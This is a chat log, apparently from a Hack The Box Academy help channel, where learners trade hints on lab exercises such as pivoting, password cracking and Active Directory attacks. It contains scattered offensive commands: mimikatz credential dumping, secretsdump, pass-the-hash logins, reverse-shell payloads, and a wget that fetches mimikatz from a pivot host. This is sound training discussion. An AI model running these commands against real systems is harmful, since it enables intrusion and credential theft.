#modules
yeah, tried but keep getting the same problem. Moving to a different lab for now. Maybe it will be better later on 🤷♂️
hey stupid question but how do i know what the flag is.. is it always something like HTB{example_flag} like HTB{64$!c_cURL_u$3r}
not always
it will usually either be told to you that the format is HTB{..} or when you get the flag it's that
however there are occasions where the flag is just a string of alphanumerics or l337 speak pertaining to how you obtained the flag
lol so i have to sometimes really read the question to make sure i know if its telling me what the flag may be or i will just see that and know its a flag
srry i just did a lab and i had no idea what the flag was with out a little google... and the question never even told me what to look for just to get the flag
yep and USUALLY they tell you explicitly that there is a /path/to/flag.txt or /path/to/${user}.txt file you're looking for
What payload would you suggest I try? I tried reverse_tcp I think and it just keep auto closing over and over.
```
Password for htb-student@//10.129.231.212/Share:
mount error(115): Operation now in progress
Refer to the mount.cifs(8) manual page (e.g. man mount.cifs) and kernel log messages (dmesg)
```
how to resolve this error?
You try it by the hostname instead? Also after add a --verbose and see if it gives any extra details
I try to mount a folder which is on windows 10 to linux.
They're on windows fundamentals
Any other solution for this?
If you're using your own VM do sudo apt upgrade && sudo apt update
I already do this.
Also
It says it's in progress doesn't necessarily say it failed
See if you can visit that directory
Is that the command they are telling you to do? Is that the IP of the spawned target
yes, I checked twice everything correct.
Is that the name of the share file
yes.
could anyone give me a nudge on broken authentication - bruteforcing cookies?
I'm struggling to find the right role for the first question
What's the section you're on
how do i get html codes
NTFS vs. Share Permissions
how do i get html codes
smbclient -L IPaddressOfTarget -U htb-student
NTFS is a Windows tool ?
New Technology File System
So it is a bit like Samba
What module is this about
No; NTFS is a file structure like how everything in Linux is a file
NTFS is used in Windows
And the Active Directory is part of the NTFS since it is a kind of phonebook
sighs
Take the fundamental courses on https://academy.hackthebox.com before asking any additional simple questions kibwe
I am trying to learn but I keep forgetting the basics
Write the basics down somewhere then
Is HTB actively working on growing the academy with new content? I assume so and if that is the case is there a suggestion area?
No one?
did you find that || admin hash || in the || notes folder || ?
i just give it a try and windows/x64/shell/reverse_tcp seem to be working fine for me or you can try getting a shell with nc.exe for a sanity check
dude, i've been trying everything I've found in those ||notes folders || via ||evil-winrm|| but i cant do shit with it, any tip pls?
the user you're trying to reach is attempting to sleep
it's been a wild and fun experience
even though i've been through 2.5 years of college i got some really great fundamental knowledge from Information Security Foundations
and a lot of stuff i've learned is immediately applicable to my classes
there's always something to learn
I'm almost 2 years into college and I've learned next to nothing from my classes
Nearly everything I know I've learned on my own
it really kinda sucks doesn't it
if you go out of your way to seek what you want, you'll retain that information much longer
and the way academy modules are structured helps
nice
can someone help me with the following question: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
I am using this command: url https://www.inlanefreight.com | grep "inlanefreight" | sed 's/^.*(inlanefreight)//' | sort | uniq -u | wc -l
but the answer is wrong
the file upload attack skill assessment was not easy....!
not helped by the little green button i didnt take any notice of for a while...
which module and section are you on?
Linux Fundamental - filter contents
yeah i'll go and check that section because i think my note is custom (i use 11 thing after the curl command )
ok. thanks
- 5 cut command 🤣
Regarding the Shells and Payloads module skills assessment, is it possible to get a webshell on host 1 without the creds in the hint?
And, is Links the only browser installed? Pain in the ass to use 
yes but it's 90% unintended and i'm not sure it's still work but there isn't only 1 application on that host
interesting
🔥
this channel is for htb academy modules
i need to get that platinum subscription
Hey guys, I'm having some trouble with the footprinting module, dns sub-section.
I think I understand the theory behind dns zone transfers (tho I'm still kinda confused on what zones are specifically).
I'm having trouble doing the last question where I need to find the x.x.x.203 IP using the dnsenum tool.
If I understood the course well I need to trick the main dns (root.inlanefreight.htb) to give me its gold by pretending to be internal.inlanefreight.htb but how do I practically do that? what is the flag in dnsenum to do so?
Thanks for any help!
What tool is best used for this one? AD Enumeration module
What powerful local group on the Domain Controller is the SAPService user a member of?
@soft cloud yeah i'm not sure what's the intended way to solve this because this a beginner module and even google give me mostly complex stuff
if you're on the domain controller that's a default windows command
I'm on a linux machine, not on the DC itself
the one show in the example
which section are you on?
Kerberoasting - from Linux
||GetUserSPNs||
It's only utilizing ||GetUserSPNs.py|| in that section
Yeah that's what I thought off but no luck, aight, will look deeper into it
HELLO
I mean no real need to trick anything, just try zone transferring
dnsenum subdomain brute forcing tool (i think) so not sure if you can do that but hint you'll need to run that tool on something that you found hint not the main domain
Subdomains of subdomains of...
if you use that tool to dump like the example there is literally a section of that output named MemberOf
Yeah my dumb ass was typing the answer with typo in the question...
i think that's called level (something) subdomains but no idea
Fuck yes!!!
any plans for these?
😭 so much to do so little time
I have a question concerning broken authentication - skill assessment, could I dm someone?
i got 80 cube so for the love of god pls release a tier 2 module so i can have even number cube 
"SQL INJECTION FUNDAMENTALS " is so looooooooooooooong
The fundamentals tend to be long if there's a bit to go through

I’m using AttackBox to do the Intro to Assembly module. What’s the best way to get the zip files you’re supposed to download onto the AttackBox?
mind if I pm you the output of my logs (to avoid spoilers)
I try to keep alive myself😂
this is not thm it's the pwnbox 🤣
also you can just use wget
I knew I was going to cop it for the wrong name - didn’t know the right one 😂
guys
what is cpe ?
Continuing professional education
^
Some certifications expire after x amount of years, CPE allows you to renew without retaking exam
For all those people who find it more convenient to bother you with their question rather than to Google it for themselves.
hello everyone, im on the attacking common services module on the email services section talking about pop3, imap, smtp. i have found the username for the domain but unsure of how to start going about finding the rest of the credentials required to access the account. i have tried hydra but no luck with the password list provided in resources. should i try a different password list (rockyou - one of the smaller ones maybe?).
one thing i havent tried yet is using o365spray or similar cloud based attacks due to the fact that the server provided doesnt seem to be one, so i dont think its the intended method
Figured it out - wasnt using the correct username 
When will the new Job Role Path be available?
All the new modules are guaranteed to do that. Right? Please say yes
i know what you mean
Mood
Can I DM you about this?
sure
guys, does cubes currency become much of a problem later on? I've just the intro the academy and not sure where to go to next
like is it worth spending cubes on linux fundamentals as I am a newbie
help, please
if you have the basic subscription you will have enough cubes to pace yourself going forward in my experience. but it depends on how fast you want to go and what you want to learn. as a newbie and with me not knowing your knowledge base i would suggest not skipping fundamental modules as they have some great information.
if you are new to this give both of those video a check
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=4JZjj_H4ei4
yeah I know nothing, I'll try and do all of the fundamentals then
thanks!! I'll check these videos out
Learn the basics of networking, computers, and coding before hacking
Depends. Networking and computer basics for sure. Coding not so much. You only need to be able to read code to be a pentester, you don't need to be able to write it yourself really
If you wanna go into something more advanced like redteaming tho then youll need to be able to code
Still something you want to know, particularly for web apps. Learning to write it helps you learn to read it. You don't need to be on the level of a developer, but you need to know what the code is doing.
True
Hey! Someone have solve Password Attacks Lab Medium ? Im stuck for priv esc? 🙂
And knowing a little bit on how to build web apps can give you the perspective of how people can misconfigure them
Yes. That is very important. While you can be a pentester without being a developer, very very often people dont actually understand how the applications theyre attacking are built.
And that causes problems
Would you have any other suggestions for a shell? When I tried that one it just kept auto closing the shell over and over again.
When I googled the section someone has the same issue
Need some more info my dude 😉
At work. If you search my name you should see my recent posts and what section/ module and issue I’m having.
been a problem for me for about two days. Real headache…..
Doing Intro to Windows Command Line Skills Assessment. The pattern is that the answer to previous question is password for next user but I can’t work out what it would be for user4. The previous answer was a number and the files were all empty so there was no flag either that could be used as a password
no one wants to have to search and scroll back to find your problem again
hi, does this: ||af6172da1f353a9b9bbbaac3ac1ed4c4:434990c8a25d2be94863561ae98bd682||look like anything anybody knows? a type of hash or something?
kinda banging my head against the wall with the broken auth skill assessment lol
yes and it's spoiler
my bad
hint decode it separately
Stuck on the Password Attacks hard lab. I have cracked the Backup.vhd. But how on earth am I able to mount or open the vhd file? I tried all the online instructions, but keep getting weird errors.
by previous answer i think he mean the one if the section
yeah that just crossed my mind looking at it for the millionth time
im currently on the easy lab for attacking common services - was able to find the credentials to log into the ftp server but everytime i try to use the ls command im getting a '229 entering extended passive mode'. is there something im doing wrong?
This is literally the only thing preventing me from finishing this module.
hint the password is the total number of hidden files
I was talking about RudeRaph
oh sorry 🤣
and i think there should be something about this in the module (forgot the section though)
Is that valid though? I’ve got the number of files right in the question but it’s not working to SSH in, thought it might be too short.
try doing that on the pwnbox and i think i did have similar issue with ftp through randomly for some reason
actually I don't really get it, this is an MD5 hash right? so i can't decode it can I?
try the second one first
im trying a different route to the flag
maybe itll turn something up
shoot me a dm with your answer just to double check
i mean try on the pwnbox for the ftp error
you can remove the first 17000 passwords or the first 150000 passwords
HI !
On the web service & api attacks in Information Disclosure (with a twist of SQLi) section :
Is a simple question about sqli
But in the second question I don't understand, we are asked for the username that has a position 736373 .
In the section we are told to try the users with IDs from 1 to 10000.
I have tried up to 100,000 but I only have IDs 1, 2 and 3.
And none of them have position 736373.
The response like this :
[{"id":"2","username":"HTB-User-John","position":"2"}]
ill give it a shot on pwnbox and see what it says
yeah that's only apply for 1 section and i think it will and did work for other also un-useable for other section
yes it is only usable for one section
only 1? i didn't even know that 🤣
i didn't noted down why but hint try some ||login bypass|| payload
and also you can do this with sqlmap
yeah works on pwnbox wtf
for the other sections just sort -u the mutated list and you should be good to go
if you want to test to see where is the issue is try something like regenerate the vpn key and debug stuff from there or just don't
i mean its fine i got the files i needed i think
i'll may re do my note on some of the module but offshore been kicking me in my nut lately but this module is still on my list to i may add this to my note and may bug you for some more info
Hey! Someone have solve Password Attacks Lab Medium ? Im stuck for priv esc? 🙂
i was wrong the module show you how to mount the file on windows 🤣 which for 10 pro you can just double click
hint ssh
Can't get it to work unfortunately. This part is giving me an error:
sudo dislocker /dev/loop0p2 -u(password) -- /media/bitLocker
Do i have to put it in like this?
sudo dislocker /dev/loop0p2 -u ExamplePassw0rd -- /media/bitLocker
Do i need quotes? Does there need to be a space??
oh no quotes or space
i was able to do it using this
@vital adder to be honest though i feel like im chasing my tail a bit with this. i dont see useful info in the files i dont think
oh wait
i think i see something
but how cloud you do it with only those link? also the only article i didn't find from the other post was the one from itsfoss, in this case the vhd file isn't a disk it's partition
so before you can mount it you have to use losetup to convert it into something that's mountable which none of the blog show
and that's kinda suck for beginner
specifically this https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0
Accessing content from Windows BitLocker encrypted partition in a vhd file on Linux
nope nvm i dont get what im supposed to do with this info
im sure its useful. but i just am not sure
finished broken authentication
the more i do them the more I hate bruteforcing modules
i forgot some term so just have to look up some thing and i think i got it wrong the vhd file is a disk and you have to use losetup to create a partitioned which that article kinda show but in a different way i think
Thanks! I copied the SAM and SYSTEM file. Now i can proceed hopefully. I'm not going to lie here, i think most of the questions in the Password Attacks module are horrendous and really need some work. The fact that there is no explanation about mounting vhd in the module is absurd to be honest. Sorry for ranting, thanks for the help.
Hashfile '7z.hash' on line 1 (hashca...c3063744d081db1492ea1cdef7a9b983): Signature unmatched
so sure how you miss this but if logged as a user started with ||m|| then should be some super obviously stuff
I think you have to use john to do the cracking my man
also try it in pwnbox
is the first bit of your hash the name if the file?
and yes try with john
no im logged into a user that starts with an ||f||
are you looking at the same assessment as me? attacking common services - easy lab?
nope sorry wrong one so hint you are not supposed to login but exploit it 🤣
you are supposed to exploit the information from those files you retrieve from the ftp server?
that's for a different hash then the one you got i just check my note and for hash cat i'm also using a different mode and the example one
for the hashcat (and john) mode you can try hashid -jm (hash or hash file)
why would you think sending a screenshot the password is a good idea ??
nope from the info you have before that
oh
Thank you, I continue to learn
flag acquired. can i pm you?
sure
Quick question (hopefully): In the password cracking module I just learned about crackmapexec. The examples use the switch "-u user.list -p password.list". I cannot use "user.list" can I? Do I need to supply my own user/pass lists? Cause if so, how do I generate user/password lists for a target I have no info on?
is this cracking passwords with hashcat or password attacks?
The module is called "Password attacks", the page is 'network services' (about WINRM, SSH, RDP, SMB, etc)
ok, i havent done that module myself. but in general you could always try SecLists
That makes sense, I did look through those. Only found password lists, not username lists? I'll try looking again 🙂
they are there
Ah its a completely different directory! Found it, thank you!!
I'll give that a try
Also, click on Resources (upper right) there is a list in that module you can download as well (in a ZIP).
Hi
Hi all,
I'm in the Password Attacks module, Credential Hunting in Linux section. I don't think i understand the question. I've tried brute forcing the password for user Will and Kira using the provided password.list, both FTP, SSH and SMB has been tried - no luck. Can i get a hint?
hi
-u /path/to/user.list
Their passwords require a bit of mutation using the custom.rule
Also lowercase usernames @uncut mirage
Hi, in Password Attacks module - medium lab.. I am trying to open the Doc file, and it just not working.. tried John with the mutated list and with rockyou now.. Which list should I try?
Did you doc2john?
Got it! there are a lot of options though, damn haha
Generally though if you're supplied a user.list though it's correct
Anyone online finished the shells and payloads section? I am having an issue on the live engagement.
Ok thanks! Seems weird though, i already did this in the Password Mutations section. Why the same problem again? This seems to have nothing to do with Credential Hunting in Linux...
it's following the same lines of thought
each section is building on each other
by the way; the credentials do not change
:) so I would definitely keep note of them
yeah I had a list of em for that module as well
Hey fellow hacker. i am stuck on the same problem. it seems there has been some missing information. i used the curl method and got back some injection points but now what? Is the question looking for a flag or a command?
ping doesn't work Getting started / Privilege Escalation. Reset target doesn't work.
yo I'm stuck on the login brute forcing - Service Authentication Brute Forcing... seems that the vm is not reachable... the vm comes with a port x.x.x.x:12345, but first exercise asks to hydra the ssh (22) service... Is it normal? did you also have problems connecting victim IPs or is it only related to this module??
which section are you on?
you can't ping or scan docker container you only have access to that one port that it give you
My thinking now is that i need to brute force the kira account using a mutated list created with passwords.list and custom.rule like you told me. Then, when i get access to the system i need to hunt for user will's credentials in the Linux machine, correct?
on sql essential flag 2 case2
potentially :) i'm not ruling anything out
I'm planning on redoing this module once Finished to really soak it in
and make better notes
sqlmap essentials http request
in hydra you can just use the port flag and give it the target port but in my note i use ssh://(ip):(port)
Can you at least tell me if i need to hunt for any credentials in linux? 😛
that's for you to find out :)
the section IS called Credential Hunting in Linux :^)
i try ping because ssh doesn't work ssh user1@ip:port
it give ssh: Could not resolve hostname ip:port : Name or service not known
just check that section to make sure it's needed a flag but if you found an injection point just run sqlmap with that
for this flag i save the request in to a file and run sqlmap with that file
why tf you should use ssh like that ???
there is a port tag
Exactly! ||Then i need to brute force the kira user.|| Thanks!
i got that to work but i cant get it without burp?
yeah it's ssh user@ IP -p port
i guess so
fuckin hate discord sometimes
poor guy named ip
he probably has notifications off for this or had his account hacked and it's just a botted account at this point
o i Forget i think my brain sleep
F for ip
no it's needed red bull
btw tom i pm'd you again if you got a minute
Tom: relevant thing in gen-images
jk don't forget to sleep
yeah i saw that and i only go to that channel for cute red panda
yeah i saw that but i'm still helping 2 guys right now so give me a sec
its np not urgent
of course only the hard lab is
@raven cairn i will use that dancing squirrel (hopefully) when i pass cpts
spoiler alert offshore is still not finished twisting my D and the APTlabs is waiting for it turn on my D
Lmao
yeah that's not a joke my nut is hurting really bad right now
Hi, may I DM someone about "Skill Assessment - Service Login" (Login Bruteforce) ?
sure shoot me a dm
Hi there all, having an odd issue on the "Bind Shells" module with the 2nd practical question. Nc is giving me a "Cannot Assign Requested Address Error" . Tried a few different VPN servers, no luck. Anyone perhaps have an idea?
Ignore, figured it out 🙂
Hey everyone, I'm new to HTB and Discord. Can anyone help me understand how to get my VPN going? I download the VPN Connection file, but what am I supposed to do with it? All it does is download a Word file.
hi, on https://academy.hackthebox.com/module/80/section/782 (Brute force a cookie) question2. I understood what I had to do, but it was impossible to find the right combination with cyberchef. ||I saw that one part of the cookie was fixed and the other varied||. But I can't find the right combination, any tips?
Anyone mind helping on Password Attacks - Credential Hunting in Windows? I found the answer(what I believe to be) for the last question but its not accepting it.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@rocky citrus ^
Also anyone have any experience with laZagne?
Also, realized I need to do the user:password format and not just the password...
Finally found the .exe release standalone on github, was trying to utilize the python file instead
Thank you!👍 @fathom pendant I'll check that out.
hi everyone
i dont really like that some challenges are literally impossible unless the hint is read because it provides vital information like "login with blablacreds"...
iirc the hint system is being reevaluated exactly for that reason
yeah cause i come from an offensive security background and i try to never look at hints
and this is getting annoying cause im wasting so much time lol
im on the file transfers module on the first question for the section 'linux file transfer methods'. the phrasing for the question makes it seem that i should be using python to download the file from the target machine. is it that or is it that the target machine is hosting the file using python http server and i can just use any of the simple methods to grab it?
The file transfer section has you remote in to do the file transfers iirc
For linux
yup you do that starting on the second question though, not the first.
first question: Download the file flag.txt from the web root using Python from the Pwnbox. Submit the contents of the file as your answer.
im assuming you just use the same method as you can do with the windows section
because i did it...and it worked
but the phrasing for the question seems just a little weird
Hey all, looking for some help with the skills assessment for Pivoting and tunnelling section. Up to the last two questions but can't seem to pivot to the new box. Anyone able to DM me to chat or anyone have any hints here?
Reverse Port Forward :
https://academy.hackthebox.com/module/158/section/1427
Problem :
i get response in msfconsole but "Command Shell Closed"
payload :
- windows/x64/meterpreter_reverse_https
- windows/x64/meterpreter/reverse_https
ok (set payload payload/windows/x64/meterpreter_reverse_tcp) works
there's something on the box to clue you in on your next step
much better question now. it says to upload the zip file and then unzip it on the target box. i dont see which tool they expect you to use to unzip it. unzip, 7z, etc. are not installed
ok how do i know thats installed
for future reference
not gunzip specifically
but in general, application listing via ssh
bc i thought about looking in /usr/share might show something but i didnt see it there
oh its in bin
not share
F
ye
gunzip is a binary but it's also just good to know in general what common zip/archive tools are
are you sure gunzip works for .zip files?
judging by the name... i'd say yea
I've been over the box, I have creds for user v***** and ssh key for m*****
I've tried to netsh ports from/to each box over common remote solutions.
Everytime I try ssh I get connection terminated for v***** and the ssh session just goes back to the same box pivot-srv01
Everytime I RDP it doesn't connect to the other internal network.
Any other clue without giving too much away?
you are overthinking it. the box gives you the clue you need to get to the next box, and the hop to it is very simple.
friendly reminder that if you're using mstsc.exe to RDP to a box, fill out all the information before attempting to connect
When doing web exploitation with metasploit, I can't figure out what the TARGETURI is supposed to be. for the current exploit im running, metasploit says it needs the full URI path to getsimplecms. I've tried inputting all the base directories
google "what is a URI"
figured it out @fathom pendant ty! btw, you know if the upload feature for the knowledge check machine in the getting started module is supposed to be broken?
Don't know what you mean by broken?
metasploit is unable to upload, and manually I am not either, "there was a problem uploading"
hmmm, hold up, may have figured it out
Thanks calculac0re I managed to RDP into the new host with the user v***** but it appears to still be the old host I RDP's from.... any ideas?
i don't understand. you RDP'd into the new host and... it's a host you already RDP'd from??
this is the channel for discussing HTB academy modules. the rest of the discord channels are locked until you verify yourself -> #welcome
Alright I will do if I find a reason ig
I've RDP's onto the first host, got flag, dumped creds > new user.
Enumerated network for new host. While still RDP'd in I followed your advice (I'm such an idiot) and filled in details I was missing and am able to connect to the new host. Although when connected (RDP tab matches new IP) It is still the old box E.g. flag is that of the previous host/question...
you ||did a ping sweep|| and ||verified that the host to hop to is on another network you haven't seen before||?
I am doing the brute force login module. But every time I try to load the log in page they give us, it says proxy server is refusing connections. I don't think that is supposed to be part of the scenario or is it?
check your browser settings (proxy)
cool
Module Pivoting
Section
Meterpreter Tunneling & Port Forwarding
This worked last night but tonight it doesn't.
check your payload on msfconsole..
ahh i think you are right
same thing happened to me
Do you have to run proxychains msfconsole? or just msfconsole?
I never understood if that was a requirement but a previous lesson they ran that command.
msfconsole is for setting up the proxy, so you don't need to run it as proxychains msfconsole
you only use proxychains if you're trying to run your command through your proxy onto the separate network
did you set the LHOST correctly (tun0)
yeah. Figured it out. I needed to use a different exploit for metasploit. and I needed to disable a plugin in the browser which was hinted at by reading the page source code
For the previous section... I tried everything. I had two people send me instructions but i could never get the shell to open.
It kept closing over and over. Someone said the shell was too big... So i tried another and that was to no avail.
What did you do for that one?
Would you DM?
sure just brushing my teeth rn
I do have a question tho. how do I ctrl + Z out of something in a shell/reverse tcp shell without just closing the shell alltogether
if you ctrl+z just do fg once you're back i think for this one i gave up on trying to get a working pty
this is killing me
im not sure why
but im unable to get the flag
ive already entered everything
and executed every command
and then deleted the city
i renamed france to flag
then deleted flag
and then went to the IP and Port and searched flag and it just says []
Am i missing something?
Module: Attacking Common Services
Section: Attacking SQL Databases
I've extracted the service user hash and am attempting to crack. I've tried hashcat and john for a || netNTLMv2 || hash type using the provided password list without success, I've also tried the rockyou wordlist with no luck, I've tried the best64 ruleset with both wordlists suspecting it may be a password mutation but I'm a bit lost. I suspect I've got the wrong hash type or may need to edit it for the tools to work properly, can I get a sanity check that I'm on the right track?
Information Gathering - Web - Skills Assessment-Last question. am using hint provided using sublist3r and it starts running against target then just stops after this error - Error: Virustotal probably now is blocking our requests. not sure what to do as screenshots of other people running it does this but also gets passed and runs the script
try using a different tool?
Any particular reason why the connection keeps timing out when I try to ssh into Bill Gates ssh for the login cracking lab?
pivoting
section Meterpreter Tunneling & Port Forwarding
I've tried this for the SRVHOST as well 127.0.0.1
same result. anyone know why this is happening?
Since Yesterday I try to resolve this error.
do_connect: Connection to 10.129.218.38 failed (Error NT_STATUS_IO_TIMEOUT)
This command gives me error - "smbclient -L 10.129.218.38 -U htb-student"
I try to off the firewall and now everything is fine.
Is there any particular reason why the hosts keep timing out?
no idea
I cant even ping the ip from mypwnbox
question for DCSync in Active Directory Enumeration & Attacks
i understand they want me to use secretsdump.py which is on the linux
but the system they enable for me was the windows
Yes
and
do i need to swap it or is there secretsdump.py on the windows aswell?
Windows can run python
do i need to revert it because i do not see secretsdump.py in the tools 😅
or do i need to copy and paste it over
Which quiz in the module is this for?
ohh i will try with ||invoke-DCSync||
||mimikatz|| keeps giving me an error when i follow the attack
What kind of error?
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
i even did the debug and the token elevate
still same issue
irrelevant, get lost
@glossy cipher Try with ||lsadump::lsa /patch|| or ||lsadump::sam||
dont seem to work
||lsadump::lsa /patch|| seem to work only in local
the domain it just gives me an error
Is there anyway to find out if its my problem or the machines problem why its not responding? when I run nmap it says its filtered.
Can someone help me out with command injection skills assessment its been hour
I am getting error like
file doesn't exist
Malicious command
And whole payload printed with file not found
File not found
Can someone tell hint me how to find the injectable parameters, is it GET OR POST request.
I have tried all the filters bypass but getting nothing.
Hi someone could help me with skills assessment on Secure Coding 101:Javascript , last two questions , thanks
Did You identify the copy or move command ? If you did it , think that You have two options to inject commands, in the middle of the sentence or in the end. Example: "mv filename_origin (here) filename_destiny (here)".
@woven copper I have tried using & | ; in encode form with and without space it just print my whole payload with file not found error
Big thanks to calculac0re today for their help. Just wondering if the Pivoting Skills assessment requires us to scan a full /16 for additional hosts?
There are more options to try, i suggest review the material and cheatsheets
No , requires scan two nets, both of /24.
Thanks for the hint, managed to find a new host and pivot to it. Now for the last pivot... scratch that, done!
pivoting looks so cool on my screen
yo
I have a (probably stupid) problem with web attacks - bypassing security filters
whatever HTTP method I use, the request gets flagged by the filter as malicious
am I missing smth?
In password attacks - Network services i'm doing the right way? it's take too much time... i think at least 1h30
Once I completed a module and If module is upgraded or if the subscription ends do I need to pay to do the module again. Or it will be unlocked forever
Once you have completed the module, you can keep it. Updates are then "free of charge"
Hello! I need help with the "information gathering - web edition" module in the section "Active infrastructure identification" in the question 2
Hey bud, did you ever get that working?
I'm stuck on the final assessment of the file upload attacks. I'm trying an XXE attack but I keep getting 500 internal server error 🤔
I'm really not sure why the XXE is not working mmmh
had non printable chars before my payload without knowing 🤦♂️
try the Change Request Method in burp or if you do it manually you'll have to fix the format up a bit, not sure if this is your issue but in note this is super obvious
Hello! I need help with the "information gathering - web edition" module in the section "Active infrastructure identification" in the question 2, please!
i would do that section from the top down and if you got a working cred then here is a tip for that, login and take all of the username in that machine and use it as a username wordlist so you are working with valid username
hint use whatweb
and if the default mode scan doesn't work for some reason try use -a 3 (most likely you don't need to use this mode)
Thanks!
can somebody pls explain me the meaning of these buttons in this page? i mean I completed these modules but why some of them have 'unlock' button and others 'start' ?
I continue and now I need help with the "information gathering - web edition" module in the section "Virtual hosts" in the first question, please!
@hallow swift use gobuster to enumerate the vhost
(sql inj excluded lol)
i don't have any unfinished module but if you got one it should say continue or something like that and if you finished a module it should say view or if you own a module but didn't do it it will say start
so in your case if you done all 3 of the module that have the full task bar then that's a bug
i completed those 3 modules 100%
also how can you view module like this? i never see module put in this format before just path
if you are in a beta thing then it's 100% a bug
you mean something like this?
gobuster vhost -u [target_url] -w [wordlist]
go here: https://academy.hackthebox.com/exams/3/ then in the left side of the page under the title there are 3 buttons, click on "RELATED JOB-ROLE PATH"
like lol "start" what hahah i made them all already
@hallow swift yes
Can someone confirm the following for me pls? (basically YES or NO would be enough as I'm not stuck just confused a little bit)
Getting Started Module, privilege escalation section.
According to the description in the beginning of the section, there's a part where ./linpeas.sh has to be used after cloning PEASS from GitHub. Apparently linpeas.sh is now called linpeas_base.sh
didn't even know that is a button 🤣
thought i was doing it all in the wrong way at the beginning hahah
but yeah my show the same all module is set as start
do i get some award after discovering this bug? lol
i mean if you help out a lot a find some good bug (like in module content) i think yeah, you can maybe ask some stuff for some stuff
or if you some bug that are related to hacking then you can get bounty but i'm not sure if htb have one i just know thm have one
hahaha yeah i was jk, dont have time for that, still at 47% for the pentesting certification, this stuff is endless
nope it's still case linpeas.sh and you can just wget it from the release page not clone the source code
Hey guys, does anyone how to find the answer to this question?
Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer.
It's on windows fundamentals
section - Windows Services & Processes
for finding the services you can use the given powershell command but instead of select -First 2 use select * to get everything and you don't need to touch the rest
but to find non-standard update services you'll have to google around a bit to find which is standard and which is not
oh, okay
Hello!
AD Enumeration & Attacks - Skills Assessment Part I
Can someone give me a hint on how to take control over the Domain Controller?
first did you take over the MS01 machine?
Yes, I have completed the previous 6 questions
I have access to MS01 as S*****c and have done the DC attack using the user t****y
I don't know how I can access the DC
did you get the Administrator hash?
I think so, I used secretsdump from kali to get the hashes using the -just-dc argument against the DC
also you may want to put the vuln in spoiler tag (use ||spoiler message||)
which target_url do I have to use? I can't get it 🤔
and you use the MS01 as a pivot point right?
also you can use -just-dc-user administrator to just get the administrator hash after that you can just connect in and get the flag
@hallow swift the url which u are using to access the website
you mean www.inlanefreight.htb ?
@hallow swift yes
but it says is unable to connect
I established a reverse port forwarding tunnel using chisel between my kali and web-win01 and then accessed MS01 from kali
if you got a meterpreter shell on MS01 you can just use autoroute and use proxychains(4) to access the DC
do I have to add it to my etc/hosts ?
@hallow swift use just need to brute force the vhost using gobuster or ffuf
also on "that" privileges section they also show you how to exploit it with mimikatz and if you rdp in with xfreerdp and use the /drive: tag to mount one of your directory as a shared drive on the target machine you can just open a cmd shell on the target machine and use mimikatz from that shared drive so from your machine without having to copy it over with something like this \\TSCLIENT\home\x64\mimikatz.exe
oh well, I did it with ffuf
use /drive:linux,/tmp to share /tmp folder. Is really useful :d
but I think I used the wrong wordlist, look:
ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://<TARGET_IP> -H "HOST: FUZZ.inlanefreight.htb" -fs 612
I already did this, and I tried to use the S*****C kerberos tkt to execute a silver ticket attack, but I think the S****C user doesn't have enough privileges as I got this error:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS
@placid quest I found the first flag, thanks!
but thanks @vital adder , I will try to access the DC using the admin hash using a PTH attack such as evil-winrm or psexec.
yeah i don't think i did a silver ticket attack for this assessment
yep you can just t**y > ||privileges|| > DC01 administrator hash and evil-winrm to get the flag
@hallow swift no problem
Great! Thank you very much!
Hello
LOGIN BRUTE FORCING
Skills Assessment - Website
someone can give me a hint ? 😇
Secure Coding 101 : Javascript , skills assessment, anyone with a hint on the /Reverse endpoint ?
If you can ps remote you can create a remote session to the computer and use Copy-Item
can anyone explain me how to find the hostname because it's turning me crazy
this is the folder
i already have
i am root aswell
yes it autocompleted
hey, for the skill assesment of server-side attacks I'm having a bit of troubles locating the flag file...
I would think it would be under /app/flag.txt
i solved it already
dont wanna talk ab it
wget http://<pivot host IP>:<port>/mimikatz.exe -o mimikatz.exe
yeah it'll still work
start the web server on your attack host
if you've got a socks proxy running on msfconsole and you've ran autoroute on your meterpreter session, you can do a reverse port forward on the meterpreter session so that you can download files off your attack box to the host on the internal network
but it doesn't seem the case and also not /flag.txt. Do we need to get rce or so?
i'm not sure what you mean by that
cd root
yeah so the attack box can access the internal host but the internal host can't access the attack box
so you do a reverse port forward with meterpreter so that the internal host has a route to your attack box
Or cd /
Well I did eternal blue CTF on htb
What's pivots https server
A particular website hosted on this server
bump (sorry) 🙂
okay ... wow hehe
hey guys, i'm doing the metasploit module rn and can't find the answer to the " Which version of Metasploit is free and can be used only through a CLI?" 😅 I've tried entering like metasploit framework and stuff but it doesn't work
what command do you run when you start the program you are speaking of?
thanks bro!
are you sure you're setting it up correctly
what does your port forward look like on meterpreter
is your attack box on the 172.16.6.0 network?
then change that IP address to the tun0 IP address
-L is your attack box
so traffic coming to the pivot host on port 1234 gets forwarded to your attack box on port 8081
there is an easy way
you can base64 encode mimikatz and decode the string on the other host
but that kinda sucks
that reverse port forward should work, i don't know why it doesn't
you could set up a share on the windows box
me neither but google may help you here
all is well that ends well
anyone did the HTB module Linux Local Privilege Escalation , i need a hint for gaining foothold on the machine without using ssh creds
Thanks for this hint. I was doing zone transfers until my fingers bled. Thanks for the syntax correction!
we really need a button to extend time on labs🫠
I know there is an extend button for pwnbox
it's usually the labs that kill me... especially on this pivot skill assessment. I guess it's good I'm practicing the commands, but it's annoying going through all the hosts again
@rustic sage Do u need help
i think in general i agree that there needs to be an extension like pwnbox for the target host. even if it is similar to a 1 time extension. sometimes you just need a bit more time to finish what you started and you really don't want to redo a bunch of work to just get back to where you were
not at the moment I haven't really given it a try yet, I just got kicked out on the second to last host lol! thank-you though I'll reach out if I need help💚
@rustic sage no problem 😊
through your rdp
use firefox, run firefox in the terminal
wdym
open a terminal and run firefox
ye got it cheers
why arent they the same if someone can clarify what are the signals and how to apply them with the kill command it would be great!!
linux fundamentals module btw
which section is it in?
